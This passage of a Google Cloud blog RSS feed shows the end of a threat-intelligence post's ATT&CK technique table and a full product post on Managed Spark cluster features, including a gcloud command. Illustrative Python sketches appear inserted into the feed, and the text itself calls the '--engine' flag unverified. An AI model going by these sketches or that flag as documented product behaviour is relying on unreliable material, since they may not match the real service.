&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1052.001&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Exfiltration Over Physical Medium: Exfiltration over USB&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Impact&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1486&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Data Encrypted for Impact&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;/div&gt;</description><pubDate>Fri, 05 Jun 2026 14:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/topics/threat-intelligence/targeted-campaign-us-law-firms/</guid><category>Threat Intelligence</category><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>Seeking Counsel: Ongoing Targeted Campaign Against US Law Firms</title><description></description><site_name>Google</site_name><url>https://cloud.google.com/blog/topics/threat-intelligence/targeted-campaign-us-law-firms/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Mandiant </name><title></title><department></department><company></company></author><author xmlns:author="http://www.w3.org/2005/Atom"><name>Google Threat Intelligence Group </name><title></title><department></department><company></company></author></item><item><title>What's new for Managed Service for Apache Spark clusters</title><link>https://cloud.google.com/blog/products/data-analytics/enhancements-to-managed-service-for-apache-spark-clusters/</link><description>&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;At Google Cloud, our goal is to let you run large-scale analytical and data science workloads with maximum efficiency so you can process big data pipelines, machine learning, and ETL tasks. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We recently announced that the Dataproc service is now &lt;/span&gt;&lt;a href="https://cloud.google.com/products/managed-service-for-apache-spark"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Managed Service for Apache Spark&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, reflecting our deep integration with the &lt;/span&gt;&lt;a href="https://cloud.google.com/data-cloud"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Agentic Data Cloud&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To support the diverse architectural needs of modern data teams, we offer the service in two distinct deployment modes: serverless and managed clusters. The serverless deployment mode completely abstracts infrastructure management for ephemeral or ad-hoc jobs, while the managed clusters deployment mode is designed for teams that require fine-grained infrastructure customization, persistent environments, long-running stateful processing, or native integration with custom Compute Engine hardware configurations.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;When it comes to managed cluster deployments, we’ve re-imagined the experience from the ground up, focusing on three core pillars: making Spark &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;faster&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; by supercharging execution speeds, &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;easier&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; to run by maximizing resource obtainability and reducing operational overhead, and &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;smarter&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; by embedding AI directly into the development and operational lifecycle. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This blog post focuses on what we announced at Google Cloud Next ’26 for the Managed Spark clusters deployment mode: enhanced flexibility to fine-tune performance and cost through a native execution engine, smarter scaling policies, and Gemini-powered extensions. For the latest on the serverless deployment mode, check out &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/data-analytics/serverless-managed-service-for-apache-spark-runtime-3-0-features?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;this blog post&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Faster, with the Lightning Engine native execution engine&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Arguably the biggest update for Managed Spark clusters is &lt;/span&gt;&lt;a href="https://cloud.google.com/dataproc/docs/guides/lightning-engine"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Lightning Engine&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, which introduces massive performance gains for Spark DataFrame/Dataset APIs and heavy Spark SQL queries. Powered by a native, C++ vectorized execution engine built on Velox and Gluten, with specialized internal enhancements, Lightning Engine bypasses JVM execution bottlenecks by compiling query plans into native instructions optimized for SIMD (Single Instruction, Multiple Data) vectorization.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This native execution engine delivers:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Up to 4.9x faster performance&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; than standard open-source Spark&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Up to 2x the price-performance &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;over the leading high-speed Spark alternative&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Crucially, taking advantage of these performance gains doesn’t require any code changes to your existing Spark applications. Because your jobs complete faster, you directly reduce your aggregate Compute Engine runtime hours and overall spend.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To enable Lightning Engine on your managed clusters, simply specify the Lightning Engine option when you’re creating a cluster.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-video"&gt;



&lt;div class="article-module article-video "&gt;
  &lt;figure&gt;
    &lt;a class="h-c-video h-c-video--marquee"
      href="https://youtube.com/watch?v=2uYC821jtEk"
      data-glue-modal-trigger="uni-modal-2uYC821jtEk-"
      data-glue-modal-disabled-on-mobile="true"&gt;

      
        

        &lt;div class="article-video__aspect-image"
          style="background-image: url(https://storage.googleapis.com/gweb-cloudblog-publish/images/maxresdefault_u5e7XRu.max-1000x1000.jpg);"&gt;
          &lt;span class="h-u-visually-hidden"&gt;The new way to use Spark: Intelligent, automated, and lightning fast&lt;/span&gt;
        &lt;/div&gt;
      
      &lt;svg role="img" class="h-c-video__play h-c-icon h-c-icon--color-white"&gt;
        &lt;use xlink:href="#mi-youtube-icon"&gt;&lt;/use&gt;
      &lt;/svg&gt;
    &lt;/a&gt;

    
      &lt;figcaption class="article-video__caption h-c-page"&gt;
        
          &lt;h4 class="h-c-headline h-c-headline--four h-u-font-weight-medium h-u-mt-std"&gt;Learn technical details and hear Lowe’s experience with Lightning Engine&lt;/h4&gt;
        
        
      &lt;/figcaption&gt;
    
  &lt;/figure&gt;
&lt;/div&gt;

&lt;div class="h-c-modal--video"
     data-glue-modal="uni-modal-2uYC821jtEk-"
     data-glue-modal-close-label="Close Dialog"&gt;
   &lt;a class="glue-yt-video"
      data-glue-yt-video-autoplay="true"
      data-glue-yt-video-height="99%"
      data-glue-yt-video-vid="2uYC821jtEk"
      data-glue-yt-video-width="100%"
      href="https://youtube.com/watch?v=2uYC821jtEk"
      ng-cloak&gt;
   &lt;/a&gt;
&lt;/div&gt;

&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Easier: Maximize resource obtainability via Flexible VMs&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Temporary localized shortages of a specific machine type can stall cluster creation or interrupt autoscaling. To dramatically improve cluster resilience against capacity constraints, &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/dataproc/docs/concepts/configuring-clusters/flexible-vms"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Flexible VMs&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; for Managed Spark clusters are now generally available. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Flexible VMs allow you to define up to ten ranked machine types for your master, primary, and secondary worker nodes. Managed Service for Apache Spark pairs this preference with automated regional zone placement, dynamically scanning the entire region to fulfill your capacity requests using the best available hardware layout. This helps your pipelines spin up predictably, reduces resource availability errors, and maximizes your ability to capture cost-effective Spot VM capacity during periods of peak demand.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
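&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;As a rough mental model of ranked preferences, the sketch below walks an ordered list of machine types and returns the first one that currently has capacity. It is a conceptual illustration only, not the service's actual placement logic: the function name &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;pick_machine_type&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, the capacity set, and the example machine types are assumptions made for this example.&lt;/span&gt;&lt;/p&gt;

```python
from typing import Optional, Sequence, Set

# The post states that up to ten ranked machine types can be defined.
MAX_RANKED_TYPES = 10


def pick_machine_type(ranked_types: Sequence[str], available: Set[str]) -> Optional[str]:
    """Return the highest-ranked machine type that has capacity, or None.

    Hypothetical helper: the real service also handles zone placement,
    which this sketch leaves out.
    """
    if len(ranked_types) > MAX_RANKED_TYPES:
        raise ValueError("at most ten ranked machine types are allowed")
    for machine_type in ranked_types:  # earlier entries are preferred
        if machine_type in available:
            return machine_type
    return None


# Example: the first choice is unavailable, so the second-ranked type is used.
preferences = ["n2-standard-8", "n2d-standard-8", "e2-standard-8"]
capacity_now = {"n2d-standard-8", "e2-standard-8"}
print(pick_machine_type(preferences, capacity_now))  # n2d-standard-8
```

&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Listing more alternatives lowers the chance that the function returns nothing, which is the intuition behind ranking several machine types rather than pinning a single one.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;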
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "
      &gt;

      
      
        
        &lt;img
            src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2_vPfgVT7.max-1000x1000.jpg"
        
          alt="2"&gt;
        
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Easier: Zero-scale clusters and scheduled stops&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To give you better fiscal control over persistent and developmental environments, we recently announced the general availability of two highly requested FinOps features: &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/dataproc/docs/guides/create-zero-scale-cluster"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;zero-scale clusters&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/dataproc/docs/concepts/configuring-clusters/scheduled-stop"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;cluster scheduled stops&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Zero-scale clusters&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: You can now provision environments that use exclusively secondary workers (Spot VMs), enabling the cluster to automatically scale down to zero worker nodes when no processing is active, leaving only the master node online to preserve metadata.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Cluster scheduled stops&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: This feature lets you configure automated cluster shutdown policies based on specific idle-time limits or a precise future timestamp.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Because these features are natively integrated, you avoid the operational friction of deleting and recreating your environment, and you stop paying for idle compute during nights and weekends.&lt;/span&gt;&lt;/p&gt;
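&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To make the two scheduled-stop triggers concrete, here is a minimal sketch of the decision they describe: stop when the cluster has been idle for at least a configured duration, or when a configured timestamp has passed. The function &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;should_stop&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; and its parameter names are hypothetical and do not correspond to the service's API or configuration fields.&lt;/span&gt;&lt;/p&gt;

```python
from datetime import datetime, timedelta, timezone
from typing import Optional


def should_stop(
    now: datetime,
    last_activity: datetime,
    max_idle: Optional[timedelta] = None,
    stop_at: Optional[datetime] = None,
) -> bool:
    """Return True if either configured stop condition is met.

    Hypothetical model: max_idle is an idle-time limit and stop_at is a
    fixed future timestamp; either one may be left unset.
    """
    idle_expired = max_idle is not None and now - last_activity >= max_idle
    deadline_passed = stop_at is not None and now >= stop_at
    return idle_expired or deadline_passed


# Example: the last job finished two hours ago.
now = datetime(2026, 6, 5, 22, 0, tzinfo=timezone.utc)
last_job = now - timedelta(hours=2)
print(should_stop(now, last_job, max_idle=timedelta(hours=1)))       # True
print(should_stop(now, last_job, stop_at=now + timedelta(hours=8)))  # False
```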
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Smarter: Managed Service for Apache Spark MCP Server&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To bridge the gap between generative AI and data engineering, we launched the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/dataproc/docs/guides/use-dataproc-mcp"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Model Context Protocol (MCP) server for Managed Service for Apache Spark&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. This open-standard integration allows LLMs and AI assistants to securely and dynamically interact with your Managed Spark clusters using natural language.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By utilizing the MCP server, your AI agents can securely connect to your data platform under existing IAM permissions. This allows agents to perform cluster-based operations, such as creating a cluster, submitting a job, or adjusting an autoscaling policy, directly from your AI application. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Smarter: Accelerating AI with the Data Agent Kit&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/data-cloud-extension"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Cloud Data Agent Kit&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; extension allows data scientists, engineers, and developers to manage their entire data workload lifecycle directly within their preferred development environment. We rolled out native support for this extension on Managed Spark clusters, enabling teams to seamlessly build and deploy specialized Data Agents for code generation and data wrangling.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "
      &gt;

      
      
        
        &lt;img
            src="https://storage.googleapis.com/gweb-cloudblog-publish/images/3_nOOSIdE.max-1000x1000.jpg"
        
          alt="3"&gt;
        
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Developers can choose to use &lt;/span&gt;&lt;a href="https://antigravity.google/blog/introducing-google-antigravity-2-0" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Antigravity 2.0&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, Google's standalone agentic development platform, or bring these agentic capabilities into their preferred IDE, including VS Code, Claude Code, or Codex, via the Data Agent Kit extensions and plugins. &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;By pairing this streamlined workflow with the raw processing power of managed clusters, these intelligent agents can securely execute complex workflows directly over petabyte-scale data lakes. Specifically, the Data Agent Kit enables developers to:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Build and orchestrate pipelines:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Author multi-node data pipelines and generate comprehensive code documentation using natural language.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Perform real-time debugging: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Leverage Gemini Cloud Assist to sift through executor logs, pinpoint root causes of job failures, and recommend actionable fixes.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Easily connect to Spark resources: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Instantly attach to serverless Spark runtimes or managed clusters without manual network configuration or local Spark installations.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Streamline Git and CI/CD management:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Commit, merge, and deploy code directly from your IDE of choice, triggering automated testing and deployment pipelines without friction.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Smarter: Next-generation Lakehouse &lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We recently launched &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/lakehouse/docs/introduction"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Lakehouse&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, which delivers read/write interoperability between engines like Managed Service for Apache Spark and BigQuery. By leveraging the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/lakehouse/docs/about-lakehouse-catalogs"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Lakehouse runtime catalog&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; as a unified, serverless metadata layer, it removes data silos and the need for complex translation layers. This agentic-first approach allows organizations to process open formats directly from Google Cloud Storage, or even query remote AWS datasets using the newly introduced &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/lakehouse/docs/about-cross-cloud-lakehouse"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;cross-cloud Lakehouse&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, all while maintaining a single source of truth for security and governance.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For customers utilizing Managed Spark clusters, this integration unlocks several powerful new capabilities. Data teams can now accelerate their most demanding ETL and data science workloads by up to 4.9x using the optimized Lightning Engine.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "
      &gt;

      
      
        
        &lt;img
            src="https://storage.googleapis.com/gweb-cloudblog-publish/images/4_ywa0kAz.max-1000x1000.png"
        
          alt="4"&gt;
        
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Next-gen runtimes: Cluster Image 3.0 with Spark 4.1&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Keeping pace with the open-source ecosystem, we rolled out &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/dataproc/docs/release-notes#May_03_2026"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cluster Image 3.0&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; in preview, built with Apache Spark 4.1 and that features an upgraded default Java runtime, Java 21. Spark 4.1 introduces a set of core open-source capabilities, including real-time mode for structured streaming. This enables your Spark environment to support real-time streaming with continuous, sub-second latency processing.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Get started today&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;These updates are live and ready to use today in Managed Spark clusters! You can enable these new features directly through the Google Cloud console or via the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;gcloud&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; CLI.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To spin up a new Managed Cluster and natively unlocking the performance of &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Lightning Engine,&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; run the following command in your terminal:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&lt;pre&gt;&lt;code&gt;gcloud dataproc clusters create my-optimized-cluster \
    --region=us-central1 \
    --image-version=2.3 \
    --engine=lightning&lt;/code&gt;&lt;/pre&gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
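&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;If you create clusters from scripts rather than an interactive terminal, it can help to assemble the command as an argument list instead of a multi-line string. The following is a minimal Python sketch of that idea, not an official client: the helper name &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;build_create_cluster_command&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; is hypothetical, and the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;--engine&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; flag is copied from the command above rather than independently verified, so check it against the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;gcloud&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; help output for your installed version.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;

```python
import shlex


def build_create_cluster_command(cluster_name, region, image_version, engine=None):
    """Return the gcloud argument list for creating a cluster.

    Hypothetical helper for illustration; the flag names mirror the
    command shown in this post.
    """
    args = [
        "gcloud", "dataproc", "clusters", "create", cluster_name,
        f"--region={region}",
        f"--image-version={image_version}",
    ]
    if engine is not None:
        # Assumption: --engine is taken verbatim from the post's command.
        args.append(f"--engine={engine}")
    return args


command = build_create_cluster_command(
    "my-optimized-cluster", "us-central1", "2.3", engine="lightning"
)

# Print a single-line, shell-quoted form so it can be reviewed before running.
print(shlex.join(command))
```

&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Once &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;gcloud&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; is installed and authenticated, the returned list could be passed to &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;subprocess.run(command, check=True)&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;. Passing a list rather than a single string sidesteps shell quoting and line-continuation mistakes.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;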
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Alternatively, navigate to the &lt;/span&gt;&lt;a href="https://console.cloud.google.com/dataproc"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Managed Service for Apache Spark page in the console&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, click Create cluster, and select ‘Enable Lightning Engine’ under the cluster configuration settings to automatically activate Lightning Engine for your Spark jobs. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We look forward to hearing about the environments you build and run as Managed Service for Apache Spark clusters!&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</description><pubDate>Thu, 04 Jun 2026 16:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/products/data-analytics/enhancements-to-managed-service-for-apache-spark-clusters/</guid><category>AI &amp; Machine Learning</category><category>Streaming</category><category>Open Source</category><category>Data Analytics</category><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>What's new for Managed Service for Apache Spark clusters</title><description></description><site_name>Google</site_name><url>https://cloud.google.com/blog/products/data-analytics/enhancements-to-managed-service-for-apache-spark-clusters/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Qiqi Wu</name><title>Senior Product Manager, Google Cloud</title><department></department><company></company></author></item><item><title>What’s new with Google Data Cloud</title><link>https://cloud.google.com/blog/products/data-analytics/whats-new-with-google-data-cloud/</link><description>&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;June 1 - June 5&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Beyond the Query: Powering AI Agents with Bigtable, Firestore &amp;amp; Memorystore &lt;br/&gt;&lt;/strong&gt;&lt;span style="font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;"&gt;Discover the latest advancements in Google Cloud's NoSQL Database portfolio, including Bigtable, Firestore, and Memorystore. This series is designed for a broad audience: whether you are exploring these databases for the first time or are an existing user looking to leverage the new capabilities announced at Next '26. &lt;br/&gt;&lt;br/&gt;&lt;/span&gt;&lt;a href="https://rsvp.withgoogle.com/events/beyond-the-query-powering-ai-agents-with-bigtable-firestore-memorystore" rel="noopener" style="font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Register here to secure your spot!&lt;/strong&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
